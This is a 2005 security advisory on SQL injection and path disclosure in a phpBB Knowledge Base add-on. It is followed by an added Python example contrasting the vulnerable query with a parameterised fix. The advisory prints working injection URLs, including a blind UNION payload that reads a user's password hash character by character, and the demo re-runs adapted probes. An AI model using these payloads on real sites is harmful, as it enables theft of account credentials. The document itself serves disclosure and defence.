phpBB - Knowledge Base MOD - SQL-Injection and Full Path Disclosure
2005-04-19T00:00:00
ID SECURITYVULNS:DOC:8375 Type securityvulns Reporter Securityvulns Modified 2005-04-19T00:00:00
Description
phpBB - Knowledge Base MOD
SQL-Injection vulnerability and Full Path Disclosure
Discovered by [R] and deluxe89
Discussion:
The phpBB - Knowledge Base MOD has an SQL injection vulnerability that is relatively hard to exploit. However, an
attacker can exploit this bug to retrieve information from the database.
The Bug:
The script doesn't filter the cat variable.
If we supply an invalid value here:
/kb.php?mode=cat&cat='
We will get an error similar to this:
Could not obtain category data
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax
SELECT * FROM phpbb_kb_categories WHERE category_id = \'
Line : 131
File : /here/is/the/full/path/functions_kb.php
/kb.php?mode=cat&cat=0+UNION+SELECT+0,0,0,0,0,0+FROM+phpbb_users+WHERE+1=0
No match: Categorie doesn't exist.
/kb.php?mode=cat&cat=0+UNION+SELECT+0,0,0,0,0,0+FROM+phpbb_users
Match: DEBUG MODE - SQL-Error
Therefore the only thing an attacker can find out is whether a row is matched or not.
Exploit:
The attacker may compare the information in the database with test values.
Example:
0+UNION+SELECT+0,0,0,0,0,0+FROM+phpbb_users+WHERE+user_id=2+AND+ascii(substring(user_password,1,1))=97
If it returns an SQL-Error, the first character of the hash is an 'a'.
Exploit available at the websites below.
Patch:
No patch available by now.
Greetz to madinfect, reddi, darkkilla, EaTh, Astovidatu and Doc
www.security-project.org
www.batznet.com
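Since the advisory lists no patch, here is an added example (not part of the advisory and not the MOD's code) that models the flaw and a fix in Python with sqlite3 rather than the MOD's PHP and MySQL. It shows why quote escaping does not help when the value lands in an unquoted numeric context, and how an integer allow-list, a bound parameter and a single generic answer remove both the match/no-match signal and the query disclosure. The two-column schema, the rows and all function names are constructed; in this model a matched row shows up as a different response, where the advisory observes the DEBUG MODE error.

```python
import re
import sqlite3

def make_db():
    # Constructed stand-in data: table names follow the advisory, columns and rows are made up.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE phpbb_kb_categories (category_id INTEGER, category_name TEXT);
        CREATE TABLE phpbb_users (user_id INTEGER, user_password TEXT);
        INSERT INTO phpbb_kb_categories VALUES (1, 'General');
        INSERT INTO phpbb_users VALUES (2, 'constructed-hash');
    """)
    return db

def escape_quotes(value):
    # Quote escaping, as seen in the advisory's error output (\'), only touches quotes.
    return value.replace("\\", "\\\\").replace("'", "\\'")

def lookup_vulnerable(db, cat):
    # Unquoted numeric context: an input without quotes passes through unchanged.
    sql = "SELECT * FROM phpbb_kb_categories WHERE category_id = " + escape_quotes(cat)
    try:
        rows = db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        # Debug-style error page: statement and error text are returned to the client.
        return "SQL Error : %s\n%s" % (exc, sql)
    return "found %d row(s)" % len(rows) if rows else "Category doesn't exist."

def lookup_hardened(db, cat):
    # Allow-list the id, bind it as a parameter, and give every failure the same answer.
    if not re.fullmatch(r"[0-9]{1,9}", cat):
        return "Category doesn't exist."
    try:
        rows = db.execute(
            "SELECT * FROM phpbb_kb_categories WHERE category_id = ?", (int(cat),)
        ).fetchall()
    except sqlite3.Error:
        return "Category doesn't exist."  # details belong in a server-side log
    return "found %d row(s)" % len(rows) if rows else "Category doesn't exist."

# The advisory's three probes, adapted to the two-column constructed schema.
PROBES = ["'", "0 UNION SELECT 0,0 FROM phpbb_users WHERE 1=0",
          "0 UNION SELECT 0,0 FROM phpbb_users"]

def compare(db):
    # Returns {probe: (vulnerable response, hardened response)}.
    return {p: (lookup_vulnerable(db, p), lookup_hardened(db, p)) for p in PROBES}
```
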